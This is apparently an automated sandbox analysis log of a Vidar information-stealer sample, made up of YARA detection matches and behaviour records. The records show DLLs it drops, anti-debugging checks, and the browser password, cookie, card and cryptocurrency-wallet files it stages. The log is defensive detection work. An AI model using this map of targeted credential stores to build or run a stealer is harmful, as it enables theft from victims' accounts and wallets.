Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Progman
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Autofill\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\CC\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\Edge_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\IE_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Downloads\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Files\Default.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\History\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\information.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\screenshot.jpg VolumeInformation Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.36.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.34.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.30.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.32.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.35.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.18.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.22.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.26.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.32.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.34.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.35.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.20.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.24.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.36.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.33.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.21.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.33.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000000.310964410.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.316342513.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.263373561.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.284609499.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.385428124.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.382566856.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.439941163.0000000000654000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.380918753.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.312670065.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.312415233.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.446397450.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.260747204.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.447190631.0000000000654000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.342678045.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.441188939.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.291682581.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.442042479.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.263849462.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.292934673.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.279961287.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.261605533.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.380515198.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345797617.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.261463923.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.341090168.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.316569747.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.292631459.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.344541650.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.378745475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.343398801.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.262230618.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.449348743.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.313374042.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.285913174.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.384930806.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.345532926.0000000002A60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.450418453.0000000003010000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.439266419.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cYKFZFK0Rg.exe PID: 5468, type: MEMORYSTR
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?? Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\?? Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\???????? Jump to behavior
